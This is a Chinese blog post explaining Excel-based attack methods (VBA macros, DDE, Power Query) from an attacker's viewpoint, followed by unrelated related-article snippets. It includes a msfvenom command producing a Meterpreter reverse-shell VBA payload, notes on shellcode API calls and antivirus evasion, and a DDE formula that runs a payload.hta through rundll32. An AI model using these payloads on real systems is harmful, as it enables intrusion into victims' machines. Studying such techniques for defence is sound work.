关于Excel的攻击探讨

近些年来APT趋势增长,有更多的恶意样本流传于世,这篇文章便初步探讨下Excel的一些攻击。站在攻击者的视角查看一些利用手法,知己知彼方能百战不殆。

随着趋势的发展,office文件一套成为了办公的需要,但同时软件的安全,也成为了企业部门保护信息重症之地。许多组织机构对企业发起APT攻击,其中最为常见的手法有鱼叉钓鱼、水坑攻击等。

在市面上流传的Excel样本,大都数都是如下攻击手法:

  • office宏攻击
  • DDE攻击
  • Power Query DDE (DDE的一种)

office宏攻击(Macros)

所谓宏,就是一些命令组织在一起,作为一个单独命令完成一个特定任务。Microsoft Word中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易”。Word使用宏语言Visual Basic将宏作为一系列指令来编写。

可以通过Kali的msfvenom生成vba恶意代码:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f vba -o shellcode.vba

创建一个xls文件,并开启开发者模式

找到宏

创建一个宏

shellcode利用相关API函数进行线程创建、内存申请、内存拷贝以及最后执行shellcode

  • CreateThread 创建线程
  • VirtualAlloc 申请虚拟内存空间
  • RtlMoveMemory 拷贝内存

大都数组织都在此处将shellcode通过运行自解密、花指令等混淆的方式来规避AV(反杀毒软件)

DDE攻击

动态数据交换(DDE),是在Windows操作系统中实现的客户端/服务端通信的方法。

当我们打开文件时,Excel会对文件的每一行分别进行检查。在对各行的内容进行分隔并复制到适当的单元格之前,Excel会检查该行是否以其命令字符开头,即用于内部函数的字符:“=”、“+”、“ - ”和“@”。根据命令前缀的不同,可能会发生以下两种情况之一:

1.如果前缀是“=”、“+”或“ - ”,则将其余部分视为表达式

2.如果前缀为“@”,Excel将搜索内部函数(例如SUM())并将参数解释为表达式

实际上,命令本身也是一种表达式。

执行外部命令

最终弹出calc

同时可以利用字符串拼接的特性构造payload

=MSEXCEL|‘\..\..\..\Windows\System32\rundll32.exe url.dll,FileProtocolHandler  c:\temp\payload.hta‘!_xlbgnm.A1

Power Query

惭愧,Power Query的方式一直没有复现成功,不知为何一直访问失败。这里附上网上的Power Query技术分析:https://xz.aliyun.com/t/5514

感兴趣的朋友可以去看看

原文地址:https://www.cnblogs.com/wh4am1/p/12384606.html

时间: 2024-10-08 22:18:11

关于Excel的攻击探讨的相关文章

[从产品角度学EXCEL 00]-为什么要关注EXCEL的本质

前言 Hello 大家好,我是尾巴,从今天开始,在这里连载<从产品角度学EXCEL>的系列文章.本文不接受无授权转载,如需转载,请先联系我,非常感谢. 与世面上的大部分EXCEL教程不同的是,我们并不会太多关注于介绍EXCEL各个功能的细节,譬如表格怎么搭建.EXCEL有什么函数等等.这些知识点在各个教程里随处可见,各位只要有心,就可以很容易的找到. 相反,这系列的文章会更多关注于EXCEL这个产品,关注EXCEL的本质. 我们会尝试从一个产品设计,或者一个编程人员的角度来解剖EXCEL的内在

Excel基本操作技巧荟萃(值得您深入探讨 他懂了)

Excel基本操作技巧荟萃 (值得您深入探讨 他懂了) 视频下载地址如下: http://pan.baidu.com/s/1nuB24XF 解压密码.红包赞赏可微信18578232537

Spring原理探索第一步-以excel导入为列探讨SpringIoc原理

问题描述 一个excel中有两个sheet页,第一个sheet页保存的是本月的数据,第二个sheet页保存的是次月的数据,两个sheet页中的数据都分别对应着数据库中不同的两张表,如何实现excel往数据库的导入呢. 问题分析 1 excel数据解析: 使用POI或者JXL 2 数据映射 因为两个sheet页分别对应着不同的两张表,就涉及挑数这个问题,要分别处理 3 数据保存: 用hibernate保存对象即可 解决方案 根据分析问题分析,我们很容易的就想到一种解决办法 本月sheet页:解析数

游戏战斗力量化模型探讨

转自:http://www.gameres.com/680109.html 战斗力量化是战斗数值设计中极为重要的一环,战斗数值中涉及平衡性的设定基本都会以战斗力为衡量标准.本文以角色战力=EHP*EDPS这一表达式为抽象模型,尝试量化单个角色的战斗能力,介绍了将各类属性和角色技能量化为战斗力的方法,并分析了该量化方法的准确性与普适性. 抽象模型的建立 EHP=EDPS*TIME——这是战斗数值的平衡性设计的关键等式,也是战斗能力量化的核心与起点.假想A.B两个角色,双方同时出手,同时死亡,则有如

如何破解Excel文档的编辑密码

对于Excel文档我们不仅可以设置打开密码,还可以设置几天几种密码,比如编辑密码.编辑密码又称写保护密码,是一种可以限制编辑权限的密码.如果我们在日常工作中发现自己忘记了excel编辑密码的话,那就需要想办法恢复.今天跟大家主要探讨的就是如何使用office密码破解工具恢复Excel文档的编辑密码.下面就来分享如何破解Excel文档的编辑密码? 设置Excel文档的编辑密码 打开需要设置的编辑密码的Excel文档,依次选择“工具->选项->安全性”或者点击左上角的“WPS表格”选择文件信息-&

GEETEST极验召集互联网大佬齐聚光谷,共同探讨交互安全问题

全球互联网技术在飞速发展的同时,网络安全事件也随之频发.除了直接带来经济损失的网络恶意攻击之外,企业在多个方面也遭受着不同程度的网络恶意攻击,包括品牌形象.管理时间.企业竞争力.客户成交量.用户行为等. 极验自2012年成立以来, 一直专注于利用人工智能技术解决日益严峻的互联网交互安全问题.为了更好的帮助企业应对日益严峻的交互安全形势,极验于9月14日举办的以"新视角.新安全"为主题的线下沙龙在光谷创业咖啡举办. 本次沙龙聚集了盛天网络.斗鱼TV.九州通.长江证券.泰康在线.楚天云.卓

论黑客喜欢攻击地方网络棋牌游戏原因与解决方案

地方棋牌游戏很容易招到黑客攻击,尤其是对于一些比较出名的平台,风险就更高一些.究竟为什么黑客这么喜欢攻击地方性棋牌游戏呢?厦门欧页网络科技有限公司,与你一起探讨. 经过许多被攻击的案例显示,黑客之所以会选择攻击棋牌游戏平台是以下原因: 1. 盗卖游戏币.一般这种情况会出现在比较成熟的平台上,使用这种方式通常都是长期进行的过程.就像蛀米虫一样,慢慢的.悄悄的进行. 2. 勒索行为.这个是绝大部分黑客攻击平台的原因.如果出现这个原因的,黑客就不会专门去挑选平台,无论平台大小.是否成熟.做这种事的也并

使用Aspose.Cell控件实现Excel高难度报表的生成(一)

时光飞逝,生活.工作.业余研究总是在不停忙碌着,转眼快到月底,该月的博客文章任务未完,停顿回忆一下,总结一些经验以及好的东西出来,大家一起分享一下.本文章主要介绍报表的生成,基于Aspose.Cell控件的报表生成.谈到报表,估计大家都有所领悟以及个人的理解,总的来说,一般的报表生成,基本上是基于以下几种方式:一种是基于微软Excel内置的引擎来实现:一种是构造HTML格式的Excle报表:一种是基于控件的方式来处理,基于控件有很多种方式,个人认为比较有名的是Aspose.Cell(收费破解)和

【渗透攻防Web篇】SQL注入攻击高级

前言 前面我们学习了如何寻找,确认,利用SQL注入漏洞的技术,本篇文章我将介绍一些更高级的技术,避开过滤,绕开防御.有攻必有防,当然还要来探讨一下SQL注入防御技巧. 目录 第五节 避开过滤方法总结 5.1.大小写变种 5.2.URL编码 5.3.SQL注释 5.4.空字节 5.5.二阶SQL注入 第六节 探讨SQL注入防御技巧 6.1.输入验证 6.2.编码输出 正文 第五节 避开过滤方法总结 Web应用为了防御包括SQL注入在内的攻击,常常使用输入过滤器,这些过滤器可以在应用的代码中,也可以